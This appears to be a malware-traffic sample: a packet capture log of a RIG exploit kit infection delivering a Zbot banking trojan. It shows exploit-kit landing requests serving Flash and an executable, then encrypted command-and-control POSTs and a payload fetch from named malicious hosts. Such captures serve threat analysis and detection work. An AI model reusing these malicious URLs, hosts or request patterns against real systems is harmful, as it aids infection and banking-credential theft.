RIG Exploit Kit Zbot Banking Trojan Malware Traffic Sample PCAP file download

2016-06-23 20:06:29.966522 IP 192.168.2.187.49207 > 46.30.46.170.80: Flags [P.], seq 474:1160, ack 3301, win 16387, length 686: HTTP: GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P5xl9o HTTP/1.1
E…..@…._………7.P…2u..fP.@.”8..GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-BF3H6PXl5gv2pHn4oieWX_P5xl9o HTTP/1.1
Accept: */*
Referer: http://cv.sertomaartscenter.com/?wXqBcrWVKhnGD4E=l3SKfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqE
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cv.sertomaartscenter.com
Connection: Keep-Alive

2016-06-23 20:06:30.300453 IP 46.30.46.170.80 > 192.168.2.187.49207: Flags [.], ack 1160, win 34, length 0
E..(F6@.3..n………P.7u..f….P..”….
2016-06-23 20:06:30.581358 IP 46.30.46.170.80 > 192.168.2.187.49207: Flags [.], seq 3301:4651, ack 1160, win 34, length 1350: HTTP: HTTP/1.1 200 OK
E..nF7@.3..’………P.7u..f….P..”.d..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:06:36 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 21772
Connection: keep-alive

2016-06-23 20:06:31.242193 IP 192.168.2.187.49206 > 46.30.46.170.80: Flags [P.], seq 1:454, ack 1, win 16537, length 453: HTTP: GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PBynpMu3lM&dfgsdf=240 HTTP/1.1
E…..@….*………6.P…G…iP.@.:…GET /index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPVQlyZAdChoB_Oqki0vHjUnH1cmQ9laHYghP7cSSR-Qy0Vr9muAVdZgvwkfU4TcCyr9LA1kQ5l8Wza-eBKqKp0N6RgBnEB_CbJQlqw-fECT6PXl5gv2pHn4oieWX_PBynpMu3lM&dfgsdf=240 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: cv.sertomaartscenter.com
Connection: Keep-Alive

2016-06-23 20:06:31.644293 IP 46.30.46.170.80 > 192.168.2.187.49206: Flags [.], ack 454, win 31, length 0
E..(i~@.3..&………P.6…i….P….G..
2016-06-23 20:06:35.628260 IP 46.30.46.170.80 > 192.168.2.187.49206: Flags [.], seq 1:1351, ack 454, win 31, length 1350: HTTP: HTTP/1.1 200 OK
E..ni.@.3…………P.6…i….P….!..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:06:41 GMT
Content-Type: application/x-msdownload
Content-Length: 603136
Connection: keep-alive
Accept-Ranges: bytes


2016-06-23 20:07:52.386490 IP 192.168.2.187.49221 > 115.28.36.224.80: Flags [P.], seq 1:414, ack 1, win 16537, length 413: HTTP: GET /copyright/files/c.c HTTP/1.1
E…..@………s.$..E.P…..9..P.@..I..GET /copyright/files/c.c HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://cv.sertomaartscenter.com/index.php?wXqBcrWVKhnGD4E=l3SMfPrfJxzFGMSUb-nJDa9BMEXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFSOzQfZPV
x-flash-version: 19,0,0,245
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.doswf.com
Connection: Keep-Alive

2016-06-23 20:07:52.767296 IP 115.28.36.224.80 > 192.168.2.187.49221: Flags [.], ack 414, win 980, length 0
E..(..@.1…s.$……P.E.9……P…….
2016-06-23 20:07:52.974763 IP 115.28.36.224.80 > 192.168.2.187.49221: Flags [P.], seq 1:281, ack 414, win 980, length 280: HTTP: HTTP/1.1 404 Not Found
E..@..@.1…s.$……P.E.9……P…….HTTP/1.1 404 Not Found
Server: nginx/1.1.19
Date: Fri, 24 Jun 2016 00:07:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.18
Content-Encoding: gzip

2d
…………W..+(-QH..IU(.HM.L.LM…..Dd…..
0

2016-06-23 20:09:34.761327 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [P.], seq 1:609, ack 1, win 16537, length 608: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…Z……….N.Py…….P.@…..POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specialbissnes.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache

%…..W………1……j…./.SW….;.(..Z#W@..N.{.%w2.a….h.h…_..[[…@Y..1………….[J……..M;4.b…O.|…zK..6$.S.o.F..6…..6.A`.7.D+…..QTp`…[.’..R5..g
…..~..D.
UU.j[.{gO.qK.z…>.:.u.d…D.?.H……TG.^..rj…….t…0Z….\hW.W..is&..7].”~.Q..=.)………@..mu.1..=`.(
..>…….
….$….=..&…         ..rCub….%……L..i……………….p…8*.7.I.8
2016-06-23 20:09:35.067774 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [.], ack 1, win 8205, length 0
E..(()@.q.J……….P.N….y…P. .l~..
2016-06-23 20:09:35.388710 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [.], ack 609, win 8195, length 0
E..( .@.q.R`………P.N….y…P. .j(..
2016-06-23 20:09:35.388830 IP 185.127.25.247.80 > 192.168.2.187.49230: Flags [P.], seq 1:392, ack 609, win 8205, length 391: HTTP: HTTP/1.1 301 Moved Permanently
E…}.@.q…………P.N….y…P. ..m..HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Fri, 24 Jun 2016 00:09:41 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: https://185.127.25.247/forum/visitcounter.php

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

2016-06-23 20:09:35.389125 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [.], ack 392, win 16439, length 0
E..(..@…]?………N.Py…….P.@7Hm……..
2016-06-23 20:09:43.839719 IP 192.168.2.187.49230 > 185.127.25.247.80: Flags [P.], seq 609:1217, ack 392, win 16439, length 608: HTTP: POST /forum/visitcounter.php HTTP/1.1
E…..@…Z……….N.Py…….P.@7….POST /forum/visitcounter.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specialbissnes.site
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache


2016-06-23 20:09:46.767834 IP 192.168.2.187.49234 > 95.163.127.184.80: Flags [P.], seq 1:203, ack 1, win 16537, length 202: HTTP: GET /forum/js/d.dat HTTP/1.1
E…..@…Ps…._….R.P.a……P.@…..GET /forum/js/d.dat HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: specanomirasa.site
Cache-Control: no-cache

2016-06-23 20:09:47.154685 IP 95.163.127.184.80 > 192.168.2.187.49234: Flags [.], ack 203, win 473, length 0
E..(..@.4..!_……..P.R…..a.oP…….
2016-06-23 20:09:47.249141 IP 95.163.127.184.80 > 192.168.2.187.49234: Flags [.], seq 1:1351, ack 203, win 473, length 1350: HTTP: HTTP/1.1 200 OK
E..n..@.4…_……..P.R…..a.oP….z..HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 24 Jun 2016 00:09:53 GMT
Content-Type: application/x-ns-proxy-autoconfig
Content-Length: 54668
Connection: close
Last-Modified: Mon, 21 Mar 2016 10:53:03 GMT
ETag: "32c0bbf-d58c-52e8ce69e81c0"
Accept-Ranges: bytes
